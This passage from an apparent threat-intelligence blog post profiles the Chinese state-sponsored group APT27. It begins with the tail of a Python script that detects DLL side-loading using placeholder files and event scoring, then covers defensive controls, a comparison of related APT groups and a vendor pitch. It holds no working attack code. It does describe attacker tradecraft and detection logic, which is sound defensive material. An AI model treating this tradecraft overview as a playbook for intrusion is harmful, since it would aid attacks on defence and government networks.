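    root = tempfile.mkdtemp(prefix="sideload_demo_")
    layout = {"Update": ["legit.exe", "helper.dll", "config.dat"],
              "Tools": ["tool.exe", "readme.txt"],
              "Lib": ["host.exe", "lib.dll"]}
    for sub, names in layout.items():
        os.makedirs(os.path.join(root, sub))
        for name in names:
            with open(os.path.join(root, sub, name), "wb") as fh:
                fh.write(b"\x00" * 16)
    return root


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["ImageLoaded"], *score_image_load(ev))
    for hit in find_deployment_triads(build_sample_tree()):
        print("triad:", hit)
```

In production, point the triad scan at the user-writable roots the post names (%APPDATA%, %TEMP%, ProgramData) rather than the whole disk, because application folders legitimately hold all three file types; the recency filter on the DLL is what keeps the result list short.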
Network Segmentation & Access Controls
APT27 conducts extensive lateral movement following initial compromise, targeting domain controllers, file servers, and data repositories. Implement network segmentation to constrain lateral movement paths, particularly isolating internet-facing servers from internal networks. Enforce multi-factor authentication on all privileged accounts and remote access pathways. Deploy privileged access management solutions and monitor for credential harvesting tools. Apply the principle of least privilege rigorously, particularly for accounts with access to the sensitive defence, energy, and government data that APT27 targets.

APT27 within China's cyber apparatus.

APT27 operates within China's extensive state-sponsored cyber ecosystem — a network of threat groups affiliated with the People's Liberation Army (PLA), the Ministry of State Security (MSS), and the Ministry of Public Security (MPS). APT27 is assessed to operate under MSS direction, though its precise organisational placement has not been publicly established with the same certainty as groups like APT10 (MSS Tianjin Bureau) or APT41 (Chengdu 404). The group shares tooling — particularly PlugX and, more recently, ShadowPad — with other Chinese APT groups, reflecting the collaborative (or at least shared-resource) nature of the Chinese cyber intelligence apparatus. APT27's focused mandate on defence, energy, and government intelligence collection positions it as a strategic intelligence collection group, distinct from the broader intellectual property theft operations of groups like APT1 or the dual-mandate operations of APT41.

| Group | Affiliation | Primary Focus | Relationship to APT27 |
| --- | --- | --- | --- |
| APT1 (Comment Crew) | PLA Unit 61398 | Broad industrial espionage across 20+ industries for economic and military advantage | Different organisational lineage (PLA vs assessed MSS). APT1 represented the earlier, military-driven model of Chinese cyber espionage. Both target defence and technology sectors, but APT1's operations were characterised by higher volume and less operational sophistication. No significant tooling overlap. |
| APT10 (Stone Panda) | MSS (Tianjin Bureau) | Managed service provider (MSP) targeting for downstream access; intellectual property theft across multiple industries | Both assessed to operate under MSS direction. APT10 focuses on supply chain access through MSPs, while APT27 favours direct compromise via watering holes and vulnerability exploitation. Both use PlugX extensively, but their operational patterns and primary tooling differ significantly. |
| APT41 (Double Dragon) | MSS (Chengdu 404) | Dual-mandate: state espionage across multiple sectors and financially motivated cybercrime | Both are MSS-affiliated and share some tooling (PlugX, ShadowPad, China Chopper). APT41's scope is broader and includes financial crime, which APT27 does not pursue. ShadowPad adoption by APT27 in recent campaigns suggests tooling proliferation from APT41 or the broader Winnti ecosystem. Both have targeted defence and technology sectors. |
| APT40 (Leviathan) | MSS (Hainan Bureau) | Maritime, defence, and engineering intelligence aligned with South China Sea interests | Both are MSS-affiliated and target defence sectors, but with different geographic and thematic focus areas. APT40 concentrates on maritime and naval technology, while APT27 has broader defence and energy targeting. Both use PlugX and share operational patterns characteristic of MSS contractors. |
| Volt Typhoon | PLA (assessed) | Pre-positioning in US critical infrastructure for potential disruption during geopolitical conflict | Fundamentally different mission. Volt Typhoon focuses on infrastructure pre-positioning using living-off-the-land techniques, while APT27 conducts traditional intelligence collection using custom malware. Both target energy and government sectors but for entirely different purposes — intelligence collection versus operational preparation. |
| APT31 (Zirconium) | MSS (assessed) | Political espionage targeting government officials, policy advisors, and political organisations | Both are MSS-assessed groups with overlapping government targeting. APT31 focuses more narrowly on political intelligence and democratic institutions, while APT27 has a broader mandate including defence and energy. Both have been observed using shared Chinese tooling and infrastructure patterns. |

APT27's sustained focus on defence and energy intelligence positions the group as a strategic asset within China's intelligence apparatus. While groups like APT41 attract attention for their dual-mandate operations and supply chain attacks, and Volt Typhoon raises alarm for its infrastructure pre-positioning, APT27 quietly and persistently collects the intelligence that informs Chinese military modernisation, energy security strategy, and foreign policy decisions. The group's shift toward targeting the Middle East and Central Asia — regions critical to China's Belt and Road Initiative — further underscores the alignment between APT27's operations and the PRC's strategic priorities. The German BfV attribution in 2022 marked an important milestone in the public understanding of APT27, but the group's activities span well beyond Germany — they remain an active and significant threat to defence, energy, and government organisations worldwide.


The bottom line.

APT27 is a patient, methodical, and technically capable Chinese state-sponsored threat group that has been conducting cyber espionage operations for over fifteen years. Their signature use of strategic web compromises — watering hole attacks targeting websites frequented by defence, energy, and government personnel — sets them apart from Chinese APT groups that rely primarily on spear-phishing or supply chain attacks. This approach allows APT27 to compromise multiple organisations through a single operation while minimising the detection risks associated with direct targeting. Combined with a capable custom malware arsenal centred on HyperBro RAT and SysUpdate, and supplemented by shared Chinese tooling including PlugX and ShadowPad, APT27 maintains the ability to penetrate and persistently operate within some of the most security-conscious enterprise environments.

The group's evolution over the past decade reflects broader trends in Chinese cyber operations: a shift from volume-based operations to more surgical targeting, the development of cross-platform capabilities to address modern cloud and Linux-based infrastructure, the adoption of legitimate cloud services for command and control to evade network-based detection, and a geographic expansion that now encompasses the Middle East and Central Asia alongside traditional Western targets. The German BfV's formal attribution in 2022 — publicly naming APT27 and linking it to the PRC — demonstrates the increasing willingness of European governments to call out Chinese cyber espionage, but has not visibly deterred the group's operations.

For organisations in APT27's target sectors — defence, aerospace, energy, government, telecommunications, and technology — the group represents a persistent and sophisticated threat that demands sustained defensive investment. APT27 does not conduct smash-and-grab operations; they establish deep, long-term access to compromised networks, patiently collecting intelligence over months or years. Defending against this operational model requires layered security that combines aggressive vulnerability management for internet-facing systems, robust endpoint detection capable of identifying DLL side-loading and in-memory payloads, network monitoring that accounts for cloud-based C2 channels, and proactive threat hunting informed by up-to-date intelligence on APT27's evolving tradecraft. The group's fifteen-year operational history makes clear that they are not going away — and their continued adaptation ensures they will remain a significant threat for years to come.


Is your organisation prepared for strategic web compromise and enterprise intrusion threats?

Our penetration testing and threat intelligence services can evaluate your defences against APT27's specific tactics — watering hole attacks, SharePoint and Exchange exploitation, DLL side-loading, cloud-based command and control, and long-duration network persistence — to identify gaps before a state-sponsored adversary exploits them.